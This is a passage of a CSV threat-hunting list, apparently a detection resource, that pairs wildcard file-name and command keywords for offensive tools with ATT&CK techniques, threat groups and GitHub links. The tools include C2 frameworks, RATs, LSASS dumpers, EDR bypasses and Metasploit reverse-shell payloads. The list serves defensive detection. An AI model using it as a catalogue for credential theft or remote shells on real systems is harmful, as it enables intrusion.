..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigLoader/sigloader.c*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*signal2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Signal-Labs/NtdllUnpatcher*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" +"*SigPloit*","offensive_tool_keyword","SigPloit","SigPloit a signaling security testing framework dedicated to Telecom Security professionals and reasearchers to pentest and exploit vulnerabilites in the signaling protocols used in mobile operators regardless of the geneartion being in use. SigPloit aims to cover all used protocols used in the operators interconnects SS7. GTP (3G). Diameter (4G) or even SIP for IMS and VoLTE infrastructures used in the access layer and SS7 message encapsulation into SIP-T. Recommendations for each vulnerability will be provided to guide the tester and the operator the steps that should be done to enhance their security posture","T1573 - T1562 - T1189 - T1190 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/SigPloiter/SigPloit","1","1","N/A","N/A","1","7","3","2019-12-17T16:51:23Z","2017-03-30T03:46:03Z" +"*sigthief.exe.manifest*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" +"*SigThief.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*sigthief.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*SigThief-master*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" +"*sigwhatever.exe*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*Silent Lsass Dump*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*silenthound.py*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","1","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" +"*silenthound_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*silenthound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*SilentHound-main*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","1","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" +"*silentLsassDump*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*SilentMoonwalk.cpp*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" +"*SilentMoonwalk.exe*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" +"*SilentMoonwalk.sln*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" +"*SilentMoonwalk-master*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" +"*SilentProcessExitRegistrySetter.cpp*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*SilentProcessExitRegistrySetter.exe*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*SILENTTRINITY*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*silenttrinity*.dll*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*SillyRAT.git*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z" +"*sillyrat.py*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z" +"*silver*/beacon.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*silver*implant.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*SilverPoision*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SilverPoision","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*SilverPoision/Rock-ON*","offensive_tool_keyword","Rock-ON","Rock-On is a all in one recon tool that will help your Recon process give a boost. It is mainley aimed to automate the whole process of recon and save the time that is being wasted in doing all this stuffs manually. A thorough blog will be up in sometime. Stay tuned for the Stable version with a UI","T1590 - T1210.001 - T1190 - T1213","TA0007 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/SilverPoision/Rock-ON","1","1","N/A","N/A","3","288","70","2019-11-30T04:00:03Z","2019-06-10T04:42:32Z" +"*SimoneLazzaris/ditty*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SimoneLazzaris/ditty","1","1","N/A","N/A","1","2","1","2022-03-10T16:15:14Z","2022-03-09T09:20:27Z" +"*simple_dropper.ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*SimpleHTTPServer.SimpleHTTPRequestHandler*","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*simplekeylogger.*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*SimplyEmail.py*","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","918","242","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" +"*SimplyEmail-master*","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","918","242","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" +"*SimplySecurity/SimplyEmail*","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","918","242","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" +"*single_reverse_tcp_shell.s*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*single_shell_bind_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*single_shell_reverse_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*single_target_exploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*sipdump2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*sipvicious_svcrack* -u100","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*sitadel http://*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"*sitadel https://*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"*sitadel.py *","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"*Sitadel-master.zip*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","1","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"*site-packages/wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*-Situational-Awareness-BOF*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*skahwah*wordsmith*","offensive_tool_keyword","wordsmith","The aim of Wordsmith is to assist with creating tailored wordlists and usernames that are primarilly based on geolocation.","T1210.001 - T1583.001 - T1583.002","TA0007 - ","N/A","N/A","Credential Access","https://github.com/skahwah/wordsmith","1","1","N/A","N/A","2","158","21","2018-05-03T13:44:01Z","2016-07-06T14:02:51Z" +"*skelsec/jackdaw*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 - T1590 - T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z" +"*SkipPasswordAgeCheck*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*SkipPortScan*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*skymem-get-mails *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" 